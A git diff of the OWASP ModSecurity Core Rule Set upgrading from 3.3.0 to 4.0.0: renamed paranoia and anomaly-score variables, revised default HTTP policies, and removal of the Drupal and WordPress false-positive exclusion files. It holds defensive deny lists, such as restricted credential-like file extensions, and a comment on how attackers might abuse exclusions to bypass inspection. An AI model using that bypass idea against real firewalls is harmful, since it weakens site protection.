ver:'OWASP_CRS/3.3.0',\ - setvar:'tx.paranoia_level=1'" + ver:'OWASP_CRS/4.0.0',\ + setvar:'tx.blocking_paranoia_level=1'" -# Default Executing Paranoia Level (rule 900000 in setup.conf) -SecRule &TX:executing_paranoia_level "@eq 0" \ +# Default Detection Paranoia Level (rule 900001 in crs-setup.conf) +SecRule &TX:detection_paranoia_level "@eq 0" \ "id:901125,\ phase:1,\ pass,\ nolog,\ - ver:'OWASP_CRS/3.3.0',\ - setvar:'tx.executing_paranoia_level=%{TX.PARANOIA_LEVEL}'" + ver:'OWASP_CRS/4.0.0',\ + setvar:'tx.detection_paranoia_level=%{TX.blocking_paranoia_level}'" -# Default Sampling Percentage (rule 900400 in setup.conf) +# Default Sampling Percentage (rule 900400 in crs-setup.conf) SecRule &TX:sampling_percentage "@eq 0" \ "id:901130,\ phase:1,\ pass,\ nolog,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ setvar:'tx.sampling_percentage=100'" -# Default Anomaly Scores (rule 900100 in setup.conf) +# Default Anomaly Scores (rule 900100 in crs-setup.conf) SecRule &TX:critical_anomaly_score "@eq 0" \ "id:901140,\ phase:1,\ pass,\ nolog,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ setvar:'tx.critical_anomaly_score=5'" SecRule &TX:error_anomaly_score "@eq 0" \ @@ -129,7 +148,7 @@ SecRule &TX:error_anomaly_score "@eq 0" \ phase:1,\ pass,\ nolog,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ setvar:'tx.error_anomaly_score=4'" SecRule &TX:warning_anomaly_score "@eq 0" \ @@ -137,7 +156,7 @@ SecRule &TX:warning_anomaly_score "@eq 0" \ phase:1,\ pass,\ nolog,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ setvar:'tx.warning_anomaly_score=3'" SecRule &TX:notice_anomaly_score "@eq 0" \ @@ -145,99 +164,90 @@ SecRule &TX:notice_anomaly_score "@eq 0" \ phase:1,\ pass,\ nolog,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ setvar:'tx.notice_anomaly_score=2'" -# Default do_reput_block -SecRule &TX:do_reput_block "@eq 0" \ - "id:901150,\ - phase:1,\ - pass,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - setvar:'tx.do_reput_block=0'" - -# Default block duration -SecRule &TX:reput_block_duration "@eq 0" \ - "id:901152,\ - phase:1,\ - pass,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - setvar:'tx.reput_block_duration=300'" - -# Default HTTP policy: allowed_methods (rule 900200) +# Default HTTP policy: allowed_methods (rule 900200 in crs-setup.conf) SecRule &TX:allowed_methods "@eq 0" \ "id:901160,\ phase:1,\ pass,\ nolog,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ setvar:'tx.allowed_methods=GET HEAD POST OPTIONS'" -# Default HTTP policy: allowed_request_content_type (rule 900220) +# Default HTTP policy: allowed_request_content_type (rule 900220 in crs-setup.conf) SecRule &TX:allowed_request_content_type "@eq 0" \ "id:901162,\ phase:1,\ pass,\ nolog,\ - ver:'OWASP_CRS/3.3.0',\ - setvar:'tx.allowed_request_content_type=|application/x-www-form-urlencoded| |multipart/form-data| |multipart/related| |text/xml| |application/xml| |application/soap+xml| |application/x-amf| |application/json| |application/cloudevents+json| |application/cloudevents-batch+json| |application/octet-stream| |application/csp-report| |application/xss-auditor-report| |text/plain|'" + ver:'OWASP_CRS/4.0.0',\ + setvar:'tx.allowed_request_content_type=|application/x-www-form-urlencoded| |multipart/form-data| |multipart/related| |text/xml| |application/xml| |application/soap+xml| |application/json| |application/cloudevents+json| |application/cloudevents-batch+json|'" -# Default HTTP policy: allowed_request_content_type_charset (rule 900270) +# Default HTTP policy: allowed_request_content_type_charset (rule 900280 in crs-setup.conf) SecRule &TX:allowed_request_content_type_charset "@eq 0" \ "id:901168,\ phase:1,\ pass,\ nolog,\ - ver:'OWASP_CRS/3.3.0',\ - setvar:'tx.allowed_request_content_type_charset=utf-8|iso-8859-1|iso-8859-15|windows-1252'" + ver:'OWASP_CRS/4.0.0',\ + setvar:'tx.allowed_request_content_type_charset=|utf-8| |iso-8859-1| |iso-8859-15| |windows-1252|'" -# Default HTTP policy: allowed_http_versions (rule 900230) +# Default HTTP policy: allowed_http_versions (rule 900230 in crs-setup.conf) SecRule &TX:allowed_http_versions "@eq 0" \ "id:901163,\ phase:1,\ pass,\ nolog,\ - ver:'OWASP_CRS/3.3.0',\ - setvar:'tx.allowed_http_versions=HTTP/1.0 HTTP/1.1 HTTP/2 HTTP/2.0'" + ver:'OWASP_CRS/4.0.0',\ + setvar:'tx.allowed_http_versions=HTTP/1.0 HTTP/1.1 HTTP/2 HTTP/2.0 HTTP/3 HTTP/3.0'" -# Default HTTP policy: restricted_extensions (rule 900240) +# Default HTTP policy: restricted_extensions (rule 900240 in crs-setup.conf) SecRule &TX:restricted_extensions "@eq 0" \ "id:901164,\ phase:1,\ pass,\ nolog,\ - ver:'OWASP_CRS/3.3.0',\ - setvar:'tx.restricted_extensions=.asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/'" + ver:'OWASP_CRS/4.0.0',\ + setvar:'tx.restricted_extensions=.asa/ .asax/ .ascx/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/'" -# Default HTTP policy: restricted_headers (rule 900250) -SecRule &TX:restricted_headers "@eq 0" \ +# Default HTTP policy: restricted_headers_basic (rule 900250 in crs-setup.conf) +SecRule &TX:restricted_headers_basic "@eq 0" \ "id:901165,\ phase:1,\ pass,\ nolog,\ - ver:'OWASP_CRS/3.3.0',\ - setvar:'tx.restricted_headers=/proxy/ /lock-token/ /content-range/ /if/'" + ver:'OWASP_CRS/4.0.0',\ + setvar:'tx.restricted_headers_basic=/content-encoding/ /proxy/ /lock-token/ /content-range/ /if/ /x-http-method-override/ /x-http-method/ /x-method-override/'" -# Default HTTP policy: static_extensions (rule 900260) -SecRule &TX:static_extensions "@eq 0" \ - "id:901166,\ +# Default HTTP policy: restricted_headers_extended (rule 900255 in crs-setup.conf) +SecRule &TX:restricted_headers_extended "@eq 0" \ + "id:901171,\ phase:1,\ pass,\ nolog,\ - ver:'OWASP_CRS/3.3.0',\ - setvar:'tx.static_extensions=/.jpg/ /.jpeg/ /.png/ /.gif/ /.js/ /.css/ /.ico/ /.svg/ /.webp/'" + ver:'OWASP_CRS/4.0.0',\ + setvar:'tx.restricted_headers_extended=/accept-charset/'" -# Default enforcing of body processor URLENCODED +# Default enforcing of body processor URLENCODED (rule 900010 in crs-setup.conf) SecRule &TX:enforce_bodyproc_urlencoded "@eq 0" \ "id:901167,\ phase:1,\ pass,\ nolog,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ setvar:'tx.enforce_bodyproc_urlencoded=0'" +# Default check for UTF8 encoding validation (rule 900950 in crs-setup.conf) +SecRule &TX:crs_validate_utf8_encoding "@eq 0" \ + "id:901169,\ + phase:1,\ + pass,\ + nolog,\ + ver:'OWASP_CRS/4.0.0',\ + setvar:'tx.crs_validate_utf8_encoding=0'" + # # -=[ Initialize internal variables ]=- # @@ -245,7 +255,6 @@ SecRule &TX:enforce_bodyproc_urlencoded "@eq 0" \ # Initialize anomaly scoring variables. # All _score variables start at 0, and are incremented by the various rules # upon detection of a possible attack. -# sql_error_match is used for shortcutting rules for performance reasons. SecAction \ "id:901200,\ @@ -253,12 +262,13 @@ SecAction \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.3.0',\ - setvar:'tx.anomaly_score=0',\ - setvar:'tx.anomaly_score_pl1=0',\ - setvar:'tx.anomaly_score_pl2=0',\ - setvar:'tx.anomaly_score_pl3=0',\ - setvar:'tx.anomaly_score_pl4=0',\ + ver:'OWASP_CRS/4.0.0',\ + setvar:'tx.blocking_inbound_anomaly_score=0',\ + setvar:'tx.detection_inbound_anomaly_score=0',\ + setvar:'tx.inbound_anomaly_score_pl1=0',\ + setvar:'tx.inbound_anomaly_score_pl2=0',\ + setvar:'tx.inbound_anomaly_score_pl3=0',\ + setvar:'tx.inbound_anomaly_score_pl4=0',\ setvar:'tx.sql_injection_score=0',\ setvar:'tx.xss_score=0',\ setvar:'tx.rfi_score=0',\ @@ -267,42 +277,35 @@ SecAction \ setvar:'tx.php_injection_score=0',\ setvar:'tx.http_violation_score=0',\ setvar:'tx.session_fixation_score=0',\ - setvar:'tx.inbound_anomaly_score=0',\ - setvar:'tx.outbound_anomaly_score=0',\ + setvar:'tx.blocking_outbound_anomaly_score=0',\ + setvar:'tx.detection_outbound_anomaly_score=0',\ setvar:'tx.outbound_anomaly_score_pl1=0',\ setvar:'tx.outbound_anomaly_score_pl2=0',\ setvar:'tx.outbound_anomaly_score_pl3=0',\ setvar:'tx.outbound_anomaly_score_pl4=0',\ - setvar:'tx.sql_error_match=0'" + setvar:'tx.anomaly_score=0'" # # -=[ Initialize collections ]=- # # Create both Global and IP collections for rules to use. -# There are some CRS rules that assume that these two collections -# have already been initiated. -# - -SecRule REQUEST_HEADERS:User-Agent "@rx ^.*$" \ - "id:901318,\ - phase:1,\ - pass,\ - t:none,t:sha1,t:hexEncode,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - setvar:'tx.ua_hash=%{MATCHED_VAR}'" +# Some plugins assume that these two collections have already +# been initialized. +# IP collection is initialized with the IP address concatened with the hashed user agent. -SecAction \ - "id:901321,\ +# Disable collection initialization by default (see rule 900130 in crs-setup.conf) +SecRule TX:ENABLE_DEFAULT_COLLECTIONS "@eq 1" \ + "id:901320,\ phase:1,\ pass,\ - t:none,\ nolog,\ - ver:'OWASP_CRS/3.3.0',\ - initcol:global=global,\ - initcol:ip=%{remote_addr}_%{tx.ua_hash},\ - setvar:'tx.real_ip=%{remote_addr}'" + ver:'OWASP_CRS/4.0.0',\ + chain" + SecRule REQUEST_HEADERS:User-Agent "@rx ^.*$" \ + "t:none,t:sha1,t:hexEncode,\ + initcol:global=global,\ + initcol:ip=%{remote_addr}_%{MATCHED_VAR}" # # -=[ Initialize Correct Body Processing ]=- @@ -318,9 +321,8 @@ SecRule REQBODY_PROCESSOR "!@rx (?:URLENCODED|MULTIPART|XML|JSON)" \ nolog,\ noauditlog,\ msg:'Enabling body inspection',\ - tag:'paranoia-level/1',\ ctl:forceRequestBodyVariable=On,\ - ver:'OWASP_CRS/3.3.0'" + ver:'OWASP_CRS/4.0.0'" # Force body processor URLENCODED SecRule TX:enforce_bodyproc_urlencoded "@eq 1" \ @@ -331,7 +333,7 @@ SecRule TX:enforce_bodyproc_urlencoded "@eq 1" \ nolog,\ noauditlog,\ msg:'Enabling forced body inspection for ASCII content',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ chain" SecRule REQBODY_PROCESSOR "!@rx (?:URLENCODED|MULTIPART|XML|JSON)" \ "ctl:requestBodyProcessor=URLENCODED" @@ -359,57 +361,30 @@ SecRule TX:enforce_bodyproc_urlencoded "@eq 1" \ # # We take the entropy contained in the UNIQUE_ID. We hash that variable and # take the first integer numbers out of it. Theoretically, it is possible -# there are no integers in a sha1 hash. We make sure we get two -# integer numbers by taking the last two digits from the DURATION counter -# (in microseconds). -# Finally, leading zeros are removed from the two-digit random number. -# +# but highly improbable that there are no integers in a hexEncoded sha1 hash. +# In the very rare event that two integers are not matched (due to only being +# a-f in all, or all but one positions) 901450 will not be triggered. +# Leading zeros are not removed from the two-digit random number, and are +# handled gracefullly by 901450 SecRule TX:sampling_percentage "@eq 100" \ "id:901400,\ phase:1,\ pass,\ nolog,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ skipAfter:END-SAMPLING" -SecRule UNIQUE_ID "@rx ^." \ +SecRule UNIQUE_ID "@rx ^[a-f]*([0-9])[a-f]*([0-9])" \ "id:901410,\ phase:1,\ pass,\ - t:sha1,t:hexEncode,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - setvar:'TX.sampling_rnd100=%{MATCHED_VAR}'" - -SecRule DURATION "@rx (..)$" \ - "id:901420,\ - phase:1,\ - pass,\ - capture,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - setvar:'TX.sampling_rnd100=%{TX.sampling_rnd100}%{TX.1}'" - -SecRule TX:sampling_rnd100 "@rx ^[a-f]*([0-9])[a-f]*([0-9])" \ - "id:901430,\ - phase:1,\ - pass,\ capture,\ + t:sha1,t:hexEncode,\ nolog,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ setvar:'TX.sampling_rnd100=%{TX.1}%{TX.2}'" -SecRule TX:sampling_rnd100 "@rx ^0([0-9])" \ - "id:901440,\ - phase:1,\ - pass,\ - capture,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - setvar:'TX.sampling_rnd100=%{TX.1}'" - - # # Sampling decision # @@ -430,8 +405,8 @@ SecRule TX:sampling_rnd100 "!@lt %{tx.sampling_percentage}" \ log,\ noauditlog,\ msg:'Sampling: Disable the rule engine based on sampling_percentage %{TX.sampling_percentage} and random number %{TX.sampling_rnd100}',\ - ctl:ruleEngine=Off,\ - ver:'OWASP_CRS/3.3.0'" + ctl:ruleRemoveByTag=OWASP_CRS,\ + ver:'OWASP_CRS/4.0.0'" SecMarker "END-SAMPLING" @@ -440,13 +415,13 @@ SecMarker "END-SAMPLING" # Configuration Plausibility Checks # -# Make sure executing paranoia level is not lower than paranoia level -SecRule TX:executing_paranoia_level "@lt %{tx.paranoia_level}" \ +# Make sure detection paranoia level is not lower than paranoia level +SecRule TX:detection_paranoia_level "@lt %{tx.blocking_paranoia_level}" \ "id:901500,\ phase:1,\ deny,\ status:500,\ t:none,\ log,\ - msg:'Executing paranoia level configured is lower than the paranoia level itself. This is illegal. Blocking request. Aborting',\ - ver:'OWASP_CRS/3.3.0'" + msg:'Detection paranoia level configured is lower than the paranoia level itself. This is illegal. Blocking request. Aborting',\ + ver:'OWASP_CRS/4.0.0'" diff --git a/rules/REQUEST-903.9001-DRUPAL-EXCLUSION-RULES.conf b/rules/REQUEST-903.9001-DRUPAL-EXCLUSION-RULES.conf deleted file mode 100644 index 2b6b1a77ed..0000000000 --- a/rules/REQUEST-903.9001-DRUPAL-EXCLUSION-RULES.conf +++ /dev/null @@ -1,407 +0,0 @@ -# ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.3.0 -# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. -# -# The OWASP ModSecurity Core Rule Set is distributed under -# Apache Software License (ASL) version 2 -# Please see the enclosed LICENSE file for full details. -# ------------------------------------------------------------------------ - -# These exclusions remedy false positives in a default Drupal install. -# The exclusions are only active if crs_exclusions_drupal=1 is set. -# See rule 900130 in crs-setup.conf.example for instructions. - -# -# [ POLICY ] -# -# Drupal is a complex application that is hard to secure with the CRS. This set -# of exclusion rules aims to sanitise the CRS in a way that allows a default -# Drupal setup to be installed and configured without much hassle as far as -# ModSecurity and the CRS are concerned. -# -# The exclusion rules are fairly straight forward in the sense that they -# disable CRS on a set of well-known parameter fields that are often the source -# of false positives / false alarms of the CRS. This includes namely the -# session cookie, the password fields and article/node bodies. -# -# This is based on two assumptions: - You have a basic trust in your -# authenticated users who are allowed to edit nodes. - Drupal allows html -# content in nodes and it protects your users from attacks via these fields. -# -# If you think these assumptions are wrong or if you would prefer a more -# careful/secure approach, you can disable the exclusion rules handling of said -# node body false positives. Do this by placing the following directive in -# RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf. -# -# SecRuleRemoveById 9001200-9001299 -# -# This will mean the CRS remain intact for the editing of node bodies. -# -# The exclusion rules in this file work without the need to define a Drupal -# installation path prefix. Instead they look at the URI from the end - or -# they use regular expressions when targeting dynamic URL. This is all not -# totally foolproof. In some cases, an advanced attacker might be able to -# doctor a request in a way that one of these exclusion rules is triggered -# and the request will bypass all further inspection despite not being a -# Drupal request at all. These exclusion rules could thus be leveraged to -# disable the CRS completely. This is why these rules are off by default. -# -# The CRS rules covered by this ruleset are the rules with Paranoia Level 1 and -# 2. If you chose to run Paranoia Level 3 or 4, you will be facing additional -# false positives which you need to handle yourself. -# -# This set of exclusion rules does not cover any additional Drupal modules -# outside of core. -# -# The exclusion rules are based on Drupal 8.1.10. -# -# And finally: This set of exclusion rules is in an experimental state. If you -# encounter false positives with the basic Drupal functionality and they are -# not covered by this rule file, then please report them. The aim is to be able -# to install and run Drupal core in a seamless manner protected by -# ModSecurity / CRS up to the paranoia level 2. - - -SecRule &TX:crs_exclusions_drupal|TX:crs_exclusions_drupal "@eq 0" \ - "id:9001000,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - skipAfter:END-DRUPAL-RULE-EXCLUSIONS" - - -# [ Table of Contents ] -# -# 9001100 Session Cookie -# 9001110 Password -# 9001120 FREE for use -# 9001130 FREE for use -# 9001140 Content and Descriptions -# 9001150 FREE for use -# 9001160 Form Token -# 9001170 Text Formats and Editors -# 9001180 WYSIWYG/CKEditor Assets and Upload -# 9001190 FREE for use -# 9001200 Content and Descriptions -# -# The rule id range from 9001200 to 9001999 is reserved for future -# use (Drupal plugins / modules). - - -# [ Session Cookie ] -# -# Giving the session cookie a dynamic name is most unfortunate -# from a ModSecurity perspective. The rule language does not allow -# us to disable rules in a granular way for individual cookies with -# dynamic names. So we need to disable rule causing false positives -# for all cookies and their names. -# -# Rule Exclusion Session Cookie: 942450 SQL Hex Encoding Identified -# -SecAction "id:9001100,\ - phase:2,\ - pass,\ - nolog,\ - ctl:ruleRemoveTargetById=942450;REQUEST_COOKIES_NAMES,\ - ctl:ruleRemoveTargetById=942450;REQUEST_COOKIES,\ - ver:'OWASP_CRS/3.3.0'" - - -# -# [ Password ] -# -# Disable the CRS completely for all occurrences of passwords. -# -SecRule REQUEST_FILENAME "@endsWith /core/install.php" \ - "id:9001110,\ - phase:2,\ - pass,\ - nolog,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:account[pass][pass1],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:account[pass][pass2],\ - ver:'OWASP_CRS/3.3.0'" - -SecRule REQUEST_FILENAME "@endsWith /user/login" \ - "id:9001112,\ - phase:2,\ - pass,\ - t:none,\ - nolog,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass,\ - ver:'OWASP_CRS/3.3.0'" - -SecRule REQUEST_FILENAME "@endsWith /admin/people/create" \ - "id:9001114,\ - phase:2,\ - pass,\ - nolog,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass[pass1],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass[pass2],\ - ver:'OWASP_CRS/3.3.0'" - -SecRule REQUEST_FILENAME "@rx /user/[0-9]+/edit$" \ - "id:9001116,\ - phase:2,\ - pass,\ - nolog,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:current_pass,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass[pass1],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass[pass2],\ - ver:'OWASP_CRS/3.3.0'" - - -# -# [ Admin Settings (general) ] -# -# Disable known false positives for various fields used on admin pages. -# -# Rule Exclusion: 920271 Invalid character in request on multiple fields/paths -# Rule Exclusion: 942430 Restricted SQL Character Anomaly Detection (args) -# Disabled completely for admin/config pages -# For the people/accounts page, we disable the CRS completely for a number of -# freeform text fields. -# -SecRule REQUEST_FILENAME "@contains /admin/config/" \ - "id:9001122,\ - phase:2,\ - pass,\ - nolog,\ - ctl:ruleRemoveById=942430,\ - ver:'OWASP_CRS/3.3.0'" - -SecRule REQUEST_FILENAME "@endsWith /admin/config/people/accounts" \ - "id:9001124,\ - phase:2,\ - pass,\ - nolog,\ - ctl:ruleRemoveById=920271,\ - ctl:ruleRemoveById=942440,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:user_mail_cancel_confirm_body,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:user_mail_password_reset_body,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:user_mail_register_admin_created_body,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:user_mail_register_no_approval_required_body,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:user_mail_register_pending_approval_body,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:user_mail_status_activated_body,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:user_mail_status_blocked_body,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:user_mail_status_canceled_body,\ - ver:'OWASP_CRS/3.3.0'" - -SecRule REQUEST_FILENAME "@endsWith /admin/config/development/configuration/single/import" \ - "id:9001126,\ - phase:2,\ - pass,\ - nolog,\ - ctl:ruleRemoveById=920271,\ - ctl:ruleRemoveById=942440,\ - ver:'OWASP_CRS/3.3.0'" - -SecRule REQUEST_FILENAME "@endsWith /admin/config/development/maintenance" \ - "id:9001128,\ - phase:2,\ - pass,\ - nolog,\ - ctl:ruleRemoveById=942440,\ - ver:'OWASP_CRS/3.3.0'" - - -# -# -# [ Content and Descriptions ] -# -# Disable known false positives for field "ids[]". -# -# Rule Exclusion: 942130 SQL Injection Attack: SQL Tautology Detected -# -SecRule REQUEST_FILENAME "@endsWith /contextual/render" \ - "id:9001140,\ - phase:2,\ - pass,\ - nolog,\ - ctl:ruleRemoveTargetById=942130;ARGS:ids[],\ - ver:'OWASP_CRS/3.3.0'" - - -# -# [ Form Token / Build ID ] -# -# Rule Exclusion for form_build_id: 942440 SQL Comment Sequence Detected on ... -# Rule Exclusion for form_token: 942450 SQL Hex Encoding -# Rule Exclusion for form_build_id: 942450 SQL Hex Encoding -# -# This is applied site-wide. -# -SecAction "id:9001160,\ - phase:2,\ - pass,\ - nolog,\ - ctl:ruleRemoveTargetById=942440;ARGS:form_build_id,\ - ctl:ruleRemoveTargetById=942450;ARGS:form_token,\ - ctl:ruleRemoveTargetById=942450;ARGS:form_build_id,\ - ver:'OWASP_CRS/3.3.0'" - - -# -# [ Text Formats and Editors ] -# -# Disable the CRS completely for two fields triggering many, many rules -# -# Rule Exclusion for two fields: 942440 SQL Comment Sequence Detected -# -SecRule REQUEST_FILENAME "@endsWith /admin/config/content/formats/manage/full_html" \ - "id:9001170,\ - phase:2,\ - pass,\ - nolog,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:editor[settings][toolbar][button_groups],\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:filters[filter_html][settings][allowed_html],\ - ver:'OWASP_CRS/3.3.0'" - - -# -# [ WYSIWYG/CKEditor Assets and Upload ] -# -# Disable the unnecessary requestBodyAccess and for binary uploads -# bigger than an arbitrary limit of 31486341 bytes. -# -# Extensive checks make sure these uploads are really legitimate. -# -SecRule REQUEST_METHOD "@streq POST" \ - "id:9001180,\ - phase:1,\ - pass,\ - t:none,\ - nolog,\ - noauditlog,\ - ver:'OWASP_CRS/3.3.0',\ - chain" - SecRule REQUEST_FILENAME "@rx /admin/content/assets/add/[a-z]+$" \ - "chain" - SecRule REQUEST_COOKIES:/S?SESS[a-f0-9]+/ "@rx ^[a-zA-Z0-9_-]+" \ - "ctl:requestBodyAccess=Off" - -SecRule REQUEST_METHOD "@streq POST" \ - "id:9001182,\ - phase:1,\ - pass,\ - t:none,\ - nolog,\ - noauditlog,\ - ver:'OWASP_CRS/3.3.0',\ - chain" - SecRule REQUEST_FILENAME "@rx /admin/content/assets/manage/[0-9]+$" \ - "chain" - SecRule ARGS:destination "@streq admin/content/assets" \ - "chain" - SecRule REQUEST_HEADERS:Content-Length "@gt 31486341" \ - "chain" - SecRule REQUEST_COOKIES:/S?SESS[a-f0-9]+/ "@rx ^[a-zA-Z0-9_-]+" \ - "ctl:requestBodyAccess=Off" - -SecRule REQUEST_METHOD "@streq POST" \ - "id:9001184,\ - phase:1,\ - pass,\ - t:none,\ - nolog,\ - noauditlog,\ - ver:'OWASP_CRS/3.3.0',\ - chain" - SecRule REQUEST_FILENAME "@rx /file/ajax/field_asset_[a-z0-9_]+/[ua]nd/0/form-[a-z0-9A-Z_-]+$" \ - "chain" - SecRule REQUEST_HEADERS:Content-Length "@gt 31486341" \ - "chain" - SecRule REQUEST_HEADERS:Content-Type "@rx ^(?i)multipart/form-data" \ - "chain" - SecRule REQUEST_COOKIES:/S?SESS[a-f0-9]+/ "@rx ^[a-zA-Z0-9_-]+" \ - "ctl:requestBodyAccess=Off" - - -# -# [ Content and Descriptions ] -# -# Disable the CRS completely for node bodies and other free text fields. -# Other rules are disabled individually. -# -# Rule Exclusion for ARGS:uid[0][target_id]: 942410 SQL Injection Attack -# Rule Exclusion for ARGS:destination: 932110 RCE: Windows Command Inj. -# -SecRule REQUEST_FILENAME "@endsWith /node/add/article" \ - "id:9001200,\ - phase:2,\ - pass,\ - nolog,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:body[0][value],\ - ctl:ruleRemoveTargetById=942410;ARGS:uid[0][target_id],\ - ver:'OWASP_CRS/3.3.0'" - -SecRule REQUEST_FILENAME "@endsWith /node/add/page" \ - "id:9001202,\ - phase:2,\ - pass,\ - nolog,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:body[0][value],\ - ctl:ruleRemoveTargetById=942410;ARGS:uid[0][target_id],\ - ver:'OWASP_CRS/3.3.0'" - -SecRule REQUEST_FILENAME "@rx /node/[0-9]+/edit$" \ - "id:9001204,\ - phase:2,\ - pass,\ - nolog,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:body[0][value],\ - ctl:ruleRemoveTargetById=942410;ARGS:uid[0][target_id],\ - ctl:ruleRemoveTargetById=932110;ARGS:destination,\ - ver:'OWASP_CRS/3.3.0'" - -SecRule REQUEST_FILENAME "@endsWith /block/add" \ - "id:9001206,\ - phase:2,\ - pass,\ - nolog,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:body[0][value],\ - ver:'OWASP_CRS/3.3.0'" - -SecRule REQUEST_FILENAME "@endsWith /admin/structure/block/block-content/manage/basic" \ - "id:9001208,\ - phase:2,\ - pass,\ - nolog,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:description,\ - ver:'OWASP_CRS/3.3.0'" - -SecRule REQUEST_FILENAME "@rx /editor/filter_xss/(?:full|basic)_html$" \ - "id:9001210,\ - phase:2,\ - pass,\ - nolog,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:value,\ - ver:'OWASP_CRS/3.3.0'" - -SecRule REQUEST_FILENAME "@rx /user/[0-9]+/contact$" \ - "id:9001212,\ - phase:2,\ - pass,\ - nolog,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:message[0][value],\ - ver:'OWASP_CRS/3.3.0'" - -SecRule REQUEST_FILENAME "@endsWith /admin/config/development/maintenance" \ - "id:9001214,\ - phase:2,\ - pass,\ - nolog,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:maintenance_mode_message,\ - ver:'OWASP_CRS/3.3.0'" - -SecRule REQUEST_FILENAME "@endsWith /admin/config/services/rss-publishing" \ - "id:9001216,\ - phase:2,\ - pass,\ - nolog,\ - ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:feed_description,\ - ver:'OWASP_CRS/3.3.0'" - - -SecMarker "END-DRUPAL-RULE-EXCLUSIONS" diff --git a/rules/REQUEST-903.9002-WORDPRESS-EXCLUSION-RULES.conf b/rules/REQUEST-903.9002-WORDPRESS-EXCLUSION-RULES.conf deleted file mode 100644 index 6a7511f4c1..0000000000 --- a/rules/REQUEST-903.9002-WORDPRESS-EXCLUSION-RULES.conf +++ /dev/null @@ -1,759 +0,0 @@ -# ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.3.0 -# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. -# -# The OWASP ModSecurity Core Rule Set is distributed under -# Apache Software License (ASL) version 2 -# Please see the enclosed LICENSE file for full details. -# ------------------------------------------------------------------------ - -# These exclusions remedy false positives in a default WordPress install. -# The exclusions are only active if crs_exclusions_wordpress=1 is set. -# See rule 900130 in crs-setup.conf.example for instructions. -# -# Note that the WordPress comment field itself is currently NOT excluded -# from checking. The reason is that malicious content is regularly being -# posted to WordPress comment forms, and there have been various cases -# of XSS and even RCE vulnerabilities exploited by WordPress comments. - -SecRule &TX:crs_exclusions_wordpress|TX:crs_exclusions_wordpress "@eq 0" \ - "id:9002000,\ - 